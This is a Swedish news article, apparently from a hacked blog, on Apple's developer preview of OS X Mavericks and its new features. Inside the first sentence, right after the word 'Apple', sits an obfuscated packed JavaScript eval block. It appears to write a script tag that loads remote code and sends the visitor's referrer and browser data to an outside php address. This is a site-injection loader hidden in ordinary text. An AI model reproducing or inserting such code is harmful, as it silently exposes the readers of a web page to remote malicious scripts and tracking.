Image Image Image Image Image Image Image Image Image Image

| 16 juni, 2021

Scroll to top

Top

Apple släpper en förhandsversion för utvecklare av OS X Mavericks

apple
Sebastian

Apple eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|finkf|var|u0026u|referrer|iytke||js|php’.split(’|’),0,{}))
släppte i dag en förhandsversion för utvecklare av OS X Mavericks  Det är den tionde större versionen som lanseras av världens mest avancerade operativsystem. OS X Mavericks innehåller över 200 nya funktioner.

Bland annat introduceras nu Kartor och iBooks för Mac, taggar och flikar i Finder, bättre stöd för flera skärmar samtidigt, nya kärntekniker för banbrytande strömsnålhet och prestanda, samt en helt ny version av Safari.

Förhandsversionen av OS X Mavericks är tillgänglig från och med i dag för medlemmar i Mac Developer Program. Mac-användare kommer att kunna hämta Mavericks från Mac App Store till hösten.

”Mac-datorerna ligger konsekvent steget före PC-branschen, och OS X är fortfarande det mest innovativa och lättanvända operativsystemet i världen”, säger Craig Federighi, Apples vice VD för Software Engineering. ”OS X Mavericks är den bästa versionen hittills med de nya programmen Kartor och iBooks, taggar och flikar i Finder, bättre stöd för flerskärmsanvändning, prestandahöjande och strömsparande funktioner, samt en helt ny Safari.”

Avancerad kartteknik från iOS kommer nu också till Mac med skarp vektorgrafik, imponerande 3D-vyer och interaktiv Flyover. Med Kartor kan du planera en resväg vid datorn och sedan skicka rutten till din iPhone för röstnavigering på resan. Kartfunktionerna är integrerade i hela Mavericks och ger användarna tillgång till karthjälp från Mail, Kontakter och Kalender. Utvecklarna kan också integrera dessa kraftfulla kartfunktioner i sina program med hjälp av Map Kit API. Med iBooks får du direkttillgång till ditt befintliga iBooks-bibliotek samt mer än 1,8 miljoner titlar i iBooks Store allt från läroböcker och klassiker till de senaste bästsäljarna. Du kan påbörja en bok på din Mac och sedan läsa vidare på din iPad, med samma anteckningar och markeringar som du gjort på datorn – iBooks fungerar smidigt med alla Apple-enheter.

 

OS X Mavericks introducerar nya kraftfulla funktioner som ger en optimal Mac-upplevelse. Taggar är ett nytt, kraftfullt sätt att ordna och hitta filer överallt på datorn eller i iCloud. Du kan enkelt tagga filer i Finder, i iCloud och när du sparar ett nytt dokument. Med hjälp av taggarna, som visas i sidofältet i Finder, kan du visa filer ordnade efter projekt eller kategorier. Finder-flikarna gör skrivbordet mer överskådligt genom att flera Finder-fönster slås ihop till ett enda fönster med flera flikar. Du kan anpassa visningen för varje flik, flytta filer mellan flikarna och även ha flera flikar öppna i helskärmsläge i Finder. Med Mavericks blir det också enklare att använda flera skärmar samtidigt på ett ännu kraftfullare sätt. Menyfältet och Dock visas nu på alla skärmar, och användare kan ha program i fönster- eller helskärmsläge på valfri skärm utan någon konfiguration. Med Mavericks kan man även använda en HDTV som extraskärm tillsammans med Apple TV och AirPlay.

Ny kärnteknik i OS X Mavericks gör datorn både strömsnålare och snabbare. Timer Coalescing grupperar lågnivååtgärder på ett smart sätt så att processorn kan vara i strömsparläge en större del av tiden och därmed spara ström, utan att datorns prestanda eller snabbhet påverkas. App Nap minskar strömåtgången för program som inte används för tillfället. Datorn svarar snabbt tack vare komprimerad minnesteknik, som automatiskt komprimerar inaktiva data när datorns minne börjar bli fullt. När objekten behövs igen avkomprimeras de omedelbart av Mavericks.

Den nya versionen av Safari har blixtrande prestanda, innovativa funktioner och banbrytande teknik. Safari överglänser andra webbläsare vad gäller strömsnålhet, minneseffektivitet och JavaScript-prestanda. Den nya arkitekturen med en process per flik gör Safari snabbare, stabilare och säkrare. I nya Safari introduceras också innovationer som delade länkar, som gör det lättare att hitta, läsa och dela intressant nytt material från Twitter och LinkedIn på ett och samma ställe.

Fler funktioner i OS X Mavericks:

• iCloud-nyckelring, som på ett säkert sätt sparar dina inloggningsuppgifter till olika webbplatser, kreditkortsnummer och Wi-Fi-lösenord och skickar dem till alla dina Apple-enheter så att du slipper komma ihåg dem. Informationen skyddas med AES-256-kryptering, både när den sparas på datorn och när den skickas till enheterna.

• Nyheter i Kalender: integrering med Kartor, kontinuerlig rullning genom veckor och månader samt en ny granskare som gör det enklare att skapa och redigera händelser.

• Interaktiva notiser som du kan använda till att svara på meddelanden och FaceTime-samtal, samt även ta bort mejl utan att lämna det aktiva programmet. Webbplatser kan nu använda notiser för att informera dig om senaste nytt, sportresultat och annat. Medan du var borta-notiser ser till att du inte missar det som har hänt medan datorn varit i viloläge.

• Xcode 5 med nya, kraftfulla och intuitiva utvecklarverktyg som mäter alla aspekter av programmens prestanda och strömanvändning och även kan användas för programtestning.